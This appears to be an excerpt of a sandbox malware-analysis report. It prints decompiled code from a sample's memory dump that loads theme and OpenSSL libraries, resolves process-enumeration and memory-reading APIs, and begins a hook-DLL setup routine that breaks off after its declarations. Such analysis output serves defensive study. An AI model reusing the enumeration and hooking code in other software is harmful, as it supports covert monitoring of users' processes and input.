                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042E5FA
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0042E60C
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0042E61E
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0042E630
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0042E642
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0042E654
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0042E666
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0042E678
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0042E68A
                                                    • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0042E69C
                                                    • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0042E6AE
                                                    • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0042E6C0
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0042E6D2
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0042E6E4
                                                    • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042E6F6
                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042E708
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042E71A
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0042E72C
                                                    • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0042E73E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                    • API String ID: 2238633743-2910565190
                                                    • Opcode ID: ee8c2f2005abb4408c06f873b3dfebe79f53f1c338d80728f9456e011397e4d0
                                                    • Instruction ID: 583b1748ec7c75dcc55376f1719c3b0464f23e6b29e7b95583f9f44409200d59
                                                    • Opcode Fuzzy Hash: ee8c2f2005abb4408c06f873b3dfebe79f53f1c338d80728f9456e011397e4d0
                                                    • Instruction Fuzzy Hash: 08A1F2B0F48660AFDB00EB67EC96B2637A8EB15704350467BB400DF696D67DA8009B5E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004906B8() {
                                                    				void* __ebx;
                                                    				void* _t158;
                                                    
                                                    				_t158 = 1;
                                                    				if( *0x49d588 == 0) {
                                                    					 *0x49d588 = LoadLibraryA("libeay32.dll");
                                                    				}
                                                    				_t160 =  *0x49d584;
                                                    				if( *0x49d584 == 0) {
                                                    					 *0x49d584 = LoadLibraryA("ssleay32.dll");
                                                    					 *0x49d454 = E0049058C("SSL_CTX_set_cipher_list", _t158);
                                                    					 *0x49d458 = E0049058C("SSL_CTX_new", _t158);
                                                    					 *0x49d45c = E0049058C("SSL_CTX_free", _t158);
                                                    					 *0x49d460 = E0049058C("SSL_set_fd", _t158);
                                                    					 *0x49d464 = E0049058C("SSL_CTX_use_PrivateKey_file", _t158);
                                                    					 *0x49d468 = E0049058C("SSL_CTX_use_certificate_file", _t158);
                                                    					 *0x49d46c = E0049058C("SSL_load_error_strings", _t158);
                                                    					 *0x49d470 = E0049058C("SSL_state_string_long", _t158);
                                                    					 *0x49d474 = E0049058C("SSL_get_peer_certificate", _t158);
                                                    					 *0x49d478 = E0049058C("SSL_CTX_set_verify", _t158);
                                                    					 *0x49d47c = E0049058C("SSL_CTX_set_verify_depth", _t158);
                                                    					 *0x49d480 = E0049058C("SSL_CTX_get_verify_depth", _t158);
                                                    					 *0x49d484 = E0049058C("SSL_CTX_set_default_passwd_cb", _t158);
                                                    					 *0x49d488 = E0049058C("SSL_CTX_set_default_passwd_cb_userdata", _t158);
                                                    					 *0x49d48c = E0049058C("SSL_CTX_check_private_key", _t158);
                                                    					 *0x49d490 = E0049058C("SSL_new", _t158);
                                                    					 *0x49d494 = E0049058C("SSL_free", _t158);
                                                    					 *0x49d498 = E0049058C("SSL_accept", _t158);
                                                    					 *0x49d49c = E0049058C("SSL_connect", _t158);
                                                    					 *0x49d4a0 = E0049058C("SSL_read", _t158);
                                                    					 *0x49d4a4 = E0049058C("SSL_peek", _t158);
                                                    					 *0x49d4a8 = E0049058C("SSL_write", _t158);
                                                    					 *0x49d4ac = E0049058C("SSL_get_error", _t158);
                                                    					 *0x49d4b0 = E0049058C("SSLv2_method", _t158);
                                                    					 *0x49d4b4 = E0049058C("SSLv2_server_method", _t158);
                                                    					 *0x49d4b8 = E0049058C("SSLv2_client_method", _t158);
                                                    					 *0x49d4bc = E0049058C("SSLv3_method", _t158);
                                                    					 *0x49d4c0 = E0049058C("SSLv3_server_method", _t158);
                                                    					 *0x49d4c4 = E0049058C("SSLv3_client_method", _t158);
                                                    					 *0x49d4c8 = E0049058C("SSLv23_method", _t158);
                                                    					 *0x49d4cc = E0049058C("SSLv23_server_method", _t158);
                                                    					 *0x49d4d0 = E0049058C("SSLv23_client_method", _t158);
                                                    					 *0x49d4d4 = E0049058C("TLSv1_method", _t158);
                                                    					 *0x49d4d8 = E0049058C("TLSv1_server_method", _t158);
                                                    					 *0x49d4dc = E0049058C("TLSv1_client_method", _t158);
                                                    					 *0x49d4e0 = E0049058C("SSL_shutdown", _t158);
                                                    					 *0x49d4e4 = E0049058C("SSL_set_connect_state", _t158);
                                                    					 *0x49d4e8 = E0049058C("SSL_set_accept_state", _t158);
                                                    					 *0x49d4ec = E0049058C("SSL_set_shutdown", _t158);
                                                    					 *0x49d4f0 = E0049058C("SSL_CTX_load_verify_locations", _t158);
                                                    					 *0x49d4f4 = E0049058C("SSL_get_session", _t158);
                                                    					 *0x49d4f8 = E0049058C("SSL_library_init", _t158);
                                                    					 *0x49d4fc = E004905FC("SSL_CTX_set_info_callback_indy", _t158, _t160);
                                                    					 *0x49d500 = E004905FC("X509_STORE_CTX_get_app_data_indy", _t158, _t160);
                                                    					 *0x49d504 = E004905FC("SSL_SESSION_get_id_indy", _t158, _t160);
                                                    					 *0x49d508 = E004905FC("SSL_SESSION_get_id_ctx_indy", _t158, _t160);
                                                    					 *0x49d50c = E004905FC("SSL_CTX_get_version_indy", _t158, _t160);
                                                    					 *0x49d510 = E004905FC("SSL_CTX_set_options_indy", _t158, _t160);
                                                    					 *0x49d514 = E00490648("X509_NAME_oneline", _t158);
                                                    					 *0x49d518 = E0049058C("X509_NAME_hash", _t158);
                                                    					 *0x49d51c = E00490648("X509_set_issuer_name", _t158);
                                                    					 *0x49d520 = E00490648("X509_get_issuer_name", _t158);
                                                    					 *0x49d524 = E00490648("X509_set_subject_name", _t158);
                                                    					 *0x49d528 = E00490648("X509_get_subject_name", _t158);
                                                    					 *0x49d52c = E0049058C("X509_digest", _t158);
                                                    					 *0x49d530 = E0049058C("EVP_md5", _t158);
                                                    					 *0x49d534 = E004905FC("X509_get_notBefore_indy", _t158, _t160);
                                                    					 *0x49d538 = E004905FC("X509_get_notAfter_indy", _t158, _t160);
                                                    					 *0x49d53c = E00490648("X509_STORE_CTX_get_error", _t158);
                                                    					 *0x49d540 = E00490648("X509_STORE_CTX_set_error", _t158);
                                                    					 *0x49d544 = E00490648("X509_STORE_CTX_get_error_depth", _t158);
                                                    					 *0x49d548 = E00490648("X509_STORE_CTX_get_current_cert", _t158);
                                                    					 *0x49d590 = E00490648("RAND_screen", _t158);
                                                    					 *0x49d54c = E00490648("des_set_odd_parity", _t158);
                                                    					 *0x49d550 = E00490648("des_set_key", _t158);
                                                    					 *0x49d554 = E00490648("des_ecb_encrypt", _t158);
                                                    					 *0x49d558 = E0049058C("SSL_set_ex_data", _t158);
                                                    					 *0x49d55c = E0049058C("SSL_get_ex_data", _t158);
                                                    					 *0x49d560 = E0049058C("SSL_load_client_CA_file", _t158);
                                                    					 *0x49d564 = E0049058C("SSL_CTX_set_client_CA_list", _t158);
                                                    					 *0x49d568 = E0049058C("SSL_CTX_set_default_verify_paths", _t158);
                                                    					 *0x49d56c = E0049058C("SSL_CTX_set_session_id_context", _t158);
                                                    					 *0x49d570 = E0049058C("SSL_CIPHER_description", _t158);
                                                    					 *0x49d574 = E0049058C("SSL_get_current_cipher", _t158);
                                                    					 *0x49d578 = E0049058C("SSL_CIPHER_get_name", _t158);
                                                    					 *0x49d57c = E0049058C("SSL_CIPHER_get_version", _t158);
                                                    					 *0x49d580 = E0049058C("SSL_CIPHER_get_bits", _t158);
                                                    					if( *0x49d454 == 0 ||  *0x49d458 == 0 ||  *0x49d45c == 0 ||  *0x49d460 == 0 ||  *0x49d464 == 0 ||  *0x49d468 == 0 ||  *0x49d46c == 0 ||  *0x49d470 == 0 ||  *0x49d474 == 0 ||  *0x49d478 == 0 ||  *0x49d484 == 0 ||  *0x49d488 == 0 ||  *0x49d48c == 0 ||  *0x49d490 == 0 ||  *0x49d494 == 0 ||  *0x49d498 == 0 ||  *0x49d49c == 0 ||  *0x49d4a0 == 0 ||  *0x49d4a4 == 0 ||  *0x49d4a8 == 0 ||  *0x49d4ac == 0 ||  *0x49d4b0 == 0 ||  *0x49d4b4 == 0 ||  *0x49d4b8 == 0 ||  *0x49d4bc == 0 ||  *0x49d4c0 == 0 ||  *0x49d4c4 == 0 ||  *0x49d4c8 == 0 ||  *0x49d4cc == 0 ||  *0x49d4d0 == 0 ||  *0x49d4d4 == 0 ||  *0x49d4d8 == 0 ||  *0x49d4dc == 0 ||  *0x49d4e0 == 0 ||  *0x49d4e4 == 0 ||  *0x49d4e8 == 0 ||  *0x49d4ec == 0 ||  *0x49d4f0 == 0 ||  *0x49d4f4 == 0 ||  *0x49d4f8 == 0 ||  *0x49d4fc == 0 ||  *0x49d500 == 0 ||  *0x49d504 == 0 ||  *0x49d508 == 0 ||  *0x49d50c == 0 ||  *0x49d510 == 0 ||  *0x49d514 == 0 ||  *0x49d51c == 0 ||  *0x49d520 == 0 ||  *0x49d524 == 0 ||  *0x49d528 == 0 ||  *0x49d534 == 0 ||  *0x49d538 == 0 ||  *0x49d53c == 0 ||  *0x49d540 == 0 ||  *0x49d544 == 0 ||  *0x49d548 == 0 ||  *0x49d54c == 0 ||  *0x49d550 == 0 ||  *0x49d554 == 0 ||  *0x49d558 == 0 ||  *0x49d55c == 0 ||  *0x49d47c == 0 ||  *0x49d480 == 0 ||  *0x49d560 == 0 ||  *0x49d564 == 0 ||  *0x49d568 == 0 ||  *0x49d56c == 0 ||  *0x49d570 == 0 ||  *0x49d574 == 0 ||  *0x49d578 == 0 ||  *0x49d580 == 0 ||  *0x49d57c == 0) {
                                                    						_t158 = 0;
                                                    					} else {
                                                    						_t158 = 1;
                                                    					}
                                                    				}
                                                    				return _t158;
                                                    			}
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(libeay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906C9
                                                      • Part of subcall function 0049058C: GetProcAddress.KERNEL32(00000000,00000000), ref: 004905C6
                                                      • Part of subcall function 00490648: GetProcAddress.KERNEL32(00000000,00000000), ref: 00490682
                                                    • LoadLibraryA.KERNEL32(ssleay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: EVP_md5$RAND_screen$SSL_CIPHER_description$SSL_CIPHER_get_bits$SSL_CIPHER_get_name$SSL_CIPHER_get_version$SSL_CTX_check_private_key$SSL_CTX_free$SSL_CTX_get_verify_depth$SSL_CTX_get_version_indy$SSL_CTX_load_verify_locations$SSL_CTX_new$SSL_CTX_set_cipher_list$SSL_CTX_set_client_CA_list$SSL_CTX_set_default_passwd_cb$SSL_CTX_set_default_passwd_cb_userdata$SSL_CTX_set_default_verify_paths$SSL_CTX_set_info_callback_indy$SSL_CTX_set_options_indy$SSL_CTX_set_session_id_context$SSL_CTX_set_verify$SSL_CTX_set_verify_depth$SSL_CTX_use_PrivateKey_file$SSL_CTX_use_certificate_file$SSL_SESSION_get_id_ctx_indy$SSL_SESSION_get_id_indy$SSL_accept$SSL_connect$SSL_free$SSL_get_current_cipher$SSL_get_error$SSL_get_ex_data$SSL_get_peer_certificate$SSL_get_session$SSL_library_init$SSL_load_client_CA_file$SSL_load_error_strings$SSL_new$SSL_peek$SSL_read$SSL_set_accept_state$SSL_set_connect_state$SSL_set_ex_data$SSL_set_fd$SSL_set_shutdown$SSL_shutdown$SSL_state_string_long$SSL_write$SSLv23_client_method$SSLv23_method$SSLv23_server_method$SSLv2_client_method$SSLv2_method$SSLv2_server_method$SSLv3_client_method$SSLv3_method$SSLv3_server_method$TLSv1_client_method$TLSv1_method$TLSv1_server_method$X509_NAME_hash$X509_NAME_oneline$X509_STORE_CTX_get_app_data_indy$X509_STORE_CTX_get_current_cert$X509_STORE_CTX_get_error$X509_STORE_CTX_get_error_depth$X509_STORE_CTX_set_error$X509_digest$X509_get_issuer_name$X509_get_notAfter_indy$X509_get_notBefore_indy$X509_get_subject_name$X509_set_issuer_name$X509_set_subject_name$des_ecb_encrypt$des_set_key$des_set_odd_parity$libeay32.dll$ssleay32.dll
                                                    • API String ID: 2574300362-3914122982
                                                    • Opcode ID: 4fe4e2f35140f34da03946c322c5fb95e3d1eee53cfea54a21f1e7ca64066c46
                                                    • Instruction ID: 3fc9e01923c26730d663d19a2b901ff2da1ed37202cb3e817e08d019f5698bc5
                                                    • Opcode Fuzzy Hash: 4fe4e2f35140f34da03946c322c5fb95e3d1eee53cfea54a21f1e7ca64066c46
                                                    • Instruction Fuzzy Hash: 9202C874D00205AEDF75EB6DA90935A3EA1E76432DF06443BA908C72B1D77C9884CF9E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004728A4() {
                                                    
                                                    				if( *0x49ebf4 == 0) {
                                                    					 *0x49ebf4 = GetModuleHandleA("kernel32.dll");
                                                    					if( *0x49ebf4 != 0) {
                                                    						 *0x49ebf8 = GetProcAddress( *0x49ebf4, "CreateToolhelp32Snapshot");
                                                    						 *0x49ebfc = GetProcAddress( *0x49ebf4, "Heap32ListFirst");
                                                    						 *0x49ec00 = GetProcAddress( *0x49ebf4, "Heap32ListNext");
                                                    						 *0x49ec04 = GetProcAddress( *0x49ebf4, "Heap32First");
                                                    						 *0x49ec08 = GetProcAddress( *0x49ebf4, "Heap32Next");
                                                    						 *0x49ec0c = GetProcAddress( *0x49ebf4, "Toolhelp32ReadProcessMemory");
                                                    						 *0x49ec10 = GetProcAddress( *0x49ebf4, "Process32First");
                                                    						 *0x49ec14 = GetProcAddress( *0x49ebf4, "Process32Next");
                                                    						 *0x49ec18 = GetProcAddress( *0x49ebf4, "Process32FirstW");
                                                    						 *0x49ec1c = GetProcAddress( *0x49ebf4, "Process32NextW");
                                                    						 *0x49ec20 = GetProcAddress( *0x49ebf4, "Thread32First");
                                                    						 *0x49ec24 = GetProcAddress( *0x49ebf4, "Thread32Next");
                                                    						 *0x49ec28 = GetProcAddress( *0x49ebf4, "Module32First");
                                                    						 *0x49ec2c = GetProcAddress( *0x49ebf4, "Module32Next");
                                                    						 *0x49ec30 = GetProcAddress( *0x49ebf4, "Module32FirstW");
                                                    						 *0x49ec34 = GetProcAddress( *0x49ebf4, "Module32NextW");
                                                    					}
                                                    				}
                                                    				if( *0x49ebf4 == 0 ||  *0x49ebf8 == 0) {
                                                    					return 0;
                                                    				} else {
                                                    					return 1;
                                                    				}
                                                    			}
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00472B2B,?,?,00475AEA,00000000,00475BD5), ref: 004728B8
                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004728D0
                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004728E2
                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004728F4
                                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00472906
                                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00472918
                                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0047292A
                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0047293C
                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0047294E
                                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00472960
                                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00472972
                                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00472984
                                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00472996
                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004729A8
                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004729BA
                                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004729CC
                                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004729DE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                    • API String ID: 667068680-597814768
                                                    • Opcode ID: d0ab3d19200f094b910b8b7cdad19644051f4102d4b70dba85ba81514668e68b
                                                    • Instruction ID: 313d851134716cbfac540d50d26340a817d4ff9888428074853f25f373159611
                                                    • Opcode Fuzzy Hash: d0ab3d19200f094b910b8b7cdad19644051f4102d4b70dba85ba81514668e68b
                                                    • Instruction Fuzzy Hash: FD311FB0A48250AFDB10EFBADD86F5633A4EB153007108A77B404DF296C6BDE8409B5E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 52%
                                                    			E00426204(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                                                    				int _v8;
                                                    				int _v12;
                                                    				char _v13;
                                                    				struct HDC__* _v20;
                                                    				void* _v24;
                                                    				void* _v28;
                                                    				long _v32;
                                                    				long _v36;
                                                    				intOrPtr _v40;
                                                    				intOrPtr* _t78;
                                                    				intOrPtr _t87;
                                                    				struct HDC__* _t88;
                                                    				intOrPtr _t91;
                                                    				struct HDC__* _t92;
                                                    				struct HDC__* _t135;
                                                    				int _t162;
                                                    				intOrPtr _t169;
                                                    				intOrPtr _t171;
                                                    				struct HDC__* _t173;
                                                    				int _t175;
                                                    				void* _t177;
                                                    				void* _t178;
                                                    				intOrPtr _t179;
                                                    
                                                    				_t177 = _t178;
                                                    				_t179 = _t178 + 0xffffffdc;
                                                    				_v12 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t173 = __eax;
                                                    				_t175 = _a16;
                                                    				_t162 = _a20;
                                                    				_v13 = 1;
                                                    				_t78 =  *0x49de34; // 0x49b0ec
                                                    				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
                                                    					_v40 = 0;
                                                    					_push(0);
                                                    					L004072E0();
                                                    					_v20 = E00426060(0);
                                                    					_push(_t177);
                                                    					_push(0x426484);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t179;
                                                    					_push(_t175);
                                                    					_push(_t162);
                                                    					_push(_a32);
                                                    					L004072D8();
                                                    					_v24 = E00426060(_a32);
                                                    					_v28 = SelectObject(_v20, _v24);
                                                    					_push(0);
                                                    					_t87 =  *0x49e894; // 0x770805ad
                                                    					_push(_t87);
                                                    					_t88 = _a32;
                                                    					_push(_t88);
                                                    					L00407440();
                                                    					_v40 = _t88;
                                                    					_push(0);
                                                    					_push(_v40);
                                                    					_push(_a32);
                                                    					L00407440();
                                                    					if(_v40 == 0) {
                                                    						_push(0xffffffff);
                                                    						_t91 =  *0x49e894; // 0x770805ad
                                                    						_push(_t91);
                                                    						_t92 = _v20;
                                                    						_push(_t92);
                                                    						L00407440();
                                                    						_v40 = _t92;
                                                    					} else {
                                                    						_push(0xffffffff);
                                                    						_push(_v40);
                                                    						_t135 = _v20;
                                                    						_push(_t135);
                                                    						L00407440();
                                                    						_v40 = _t135;
                                                    					}
                                                    					_push(_v20);
                                                    					L00407418();
                                                    					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
                                                    					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
                                                    					_v32 = SetTextColor(_t173, 0);
                                                    					_v36 = SetBkColor(_t173, 0xffffff);
                                                    					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
                                                    					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
                                                    					SetTextColor(_t173, _v32);
                                                    					SetBkColor(_t173, _v36);
                                                    					if(_v28 != 0) {
                                                    						SelectObject(_v20, _v28);
                                                    					}
                                                    					DeleteObject(_v24);
                                                    					_pop(_t169);
                                                    					 *[fs:eax] = _t169;
                                                    					_push(0x42648b);
                                                    					if(_v40 != 0) {
                                                    						_push(0);
                                                    						_push(_v40);
                                                    						_push(_v20);
                                                    						L00407440();
                                                    					}
                                                    					return DeleteDC(_v20);
                                                    				} else {
                                                    					_push(1);
                                                    					_push(1);
                                                    					_push(_a32);
                                                    					L004072D8();
                                                    					_v24 = E00426060(_a32);
                                                    					_v24 = SelectObject(_a12, _v24);
                                                    					_push(_t177);
                                                    					_push(0x4262d7);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t179;
                                                    					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407A44(0xaa0029, 0xcc0020));
                                                    					_pop(_t171);
                                                    					 *[fs:eax] = _t171;
                                                    					_push(0x42648b);
                                                    					_v24 = SelectObject(_a12, _v24);
                                                    					return DeleteObject(_v24);
                                                    				}
                                                    			}
                                                    0x00426437
                                                    0x00426440
                                                    0x0042644a
                                                    0x0042644a
                                                    0x00426453
                                                    0x0042645a
                                                    0x0042645d
                                                    0x00426460
                                                    0x00426469
                                                    0x0042646b
                                                    0x00426470
                                                    0x00426474
                                                    0x00426475
                                                    0x00426475
                                                    0x00426483
                                                    0x0042623f
                                                    0x0042623f
                                                    0x00426241
                                                    0x00426246
                                                    0x00426247
                                                    0x00426251
                                                    0x00426261
                                                    0x00426266
                                                    0x00426267
                                                    0x0042626c
                                                    0x0042626f
                                                    0x004262ab
                                                    0x004262b2
                                                    0x004262b5
                                                    0x004262b8
                                                    0x004262ca
                                                    0x004262d6
                                                    0x004262d6

                                                    APIs
                                                    • 733AA520.GDI32(?,00000001,00000001), ref: 00426247
                                                    • SelectObject.GDI32(?,?), ref: 0042625C
                                                    • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,004262D7,?,?), ref: 004262AB
                                                    • SelectObject.GDI32(?,?), ref: 004262C5
                                                    • DeleteObject.GDI32(?), ref: 004262D1
                                                    • 733AA590.GDI32(00000000), ref: 004262E5
                                                    • 733AA520.GDI32(?,?,?,00000000,00426484,?,00000000), ref: 00426306
                                                    • SelectObject.GDI32(?,?), ref: 0042631B
                                                    • 733AB410.GDI32(?,770805AD,00000000,?,?,?,?,?,00000000,00426484,?,00000000), ref: 0042632F
                                                    • 733AB410.GDI32(?,?,00000000,?,770805AD,00000000,?,?,?,?,?,00000000,00426484,?,00000000), ref: 00426341
                                                    • 733AB410.GDI32(?,00000000,000000FF,?,?,00000000,?,770805AD,00000000,?,?,?,?,?,00000000,00426484), ref: 00426356
                                                    • 733AB410.GDI32(?,770805AD,000000FF,?,?,00000000,?,770805AD,00000000,?,?,?,?,?,00000000,00426484), ref: 0042636C
                                                    • 733AB150.GDI32(?,?,770805AD,000000FF,?,?,00000000,?,770805AD,00000000,?,?,?,?,?,00000000), ref: 00426378
                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042639A
                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 004263BC
                                                    • SetTextColor.GDI32(?,00000000), ref: 004263C4
                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004263D2
                                                    • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004263FE
                                                    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00426423
                                                    • SetTextColor.GDI32(?,?), ref: 0042642D
                                                    • SetBkColor.GDI32(?,?), ref: 00426437
                                                    • SelectObject.GDI32(?,00000000), ref: 0042644A
                                                    • DeleteObject.GDI32(?), ref: 00426453
                                                    • 733AB410.GDI32(?,00000000,00000000,0042648B,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00426475
                                                    • DeleteDC.GDI32(?), ref: 0042647E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                                    • String ID:
                                                    • API String ID: 3348367721-0
                                                    • Opcode ID: f0ca5a636ac73ba622d966c104afb591202a263e1aac509bb4c4970d7894d6e6
                                                    • Instruction ID: aac08ee918962813e68096157f6589243fc941b0343c0b747259aa04d8bf8f88
                                                    • Opcode Fuzzy Hash: f0ca5a636ac73ba622d966c104afb591202a263e1aac509bb4c4970d7894d6e6
                                                    • Instruction Fuzzy Hash: 7681A6B1A44218AFDB50EE99CD81FAF7BECAB0D714F510559FA18F7281C238AD008B75
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 86%
                                                    			E004764E4(void* __eax, void* __ebx, void __ecx, void* __edx, void* __edi, void* __esi) {
                                                    				// Delphi register calling convention: __eax = object, __edx = enable flag
                                                    				// (0 = tear down, otherwise set up), __ecx = 32-bit value handed to the hook
                                                    				// DLL through two named shared sections. Object fields used below:
                                                    				//   +0x30/+0x34 section handles, +0x38/+0x3c mapped views, +0x40 HMODULE,
                                                    				//   +0x44 HookOn export, +0x48 HookOff export.
                                                    				char _v8;
                                                    				struct HINSTANCE__* _t30;
                                                    				intOrPtr _t46;
